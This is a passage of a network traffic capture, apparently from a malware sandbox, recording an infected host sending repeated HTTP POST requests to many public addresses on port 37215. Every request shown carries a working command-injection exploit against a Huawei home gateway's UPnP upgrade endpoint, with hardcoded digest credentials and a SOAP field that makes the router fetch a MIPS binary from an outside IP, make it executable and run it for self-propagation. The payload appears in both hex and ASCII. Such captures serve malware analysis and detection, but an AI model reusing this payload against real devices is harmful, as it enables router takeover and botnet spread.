62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  665192.168.2.1360682157.25.185.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364732027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  666192.168.2.135935041.27.55.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364746094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  667192.168.2.1356696157.241.48.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364772081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  668192.168.2.1338534157.193.134.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364788055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  669192.168.2.133401041.75.50.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364804983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  670192.168.2.135939853.96.55.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364828110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  671192.168.2.1347616197.239.77.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364854097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  672192.168.2.134824641.67.81.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369116068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  673192.168.2.1338192177.77.63.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369195938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  674192.168.2.135284841.37.193.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369240999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  675192.168.2.135699441.113.110.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369265079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
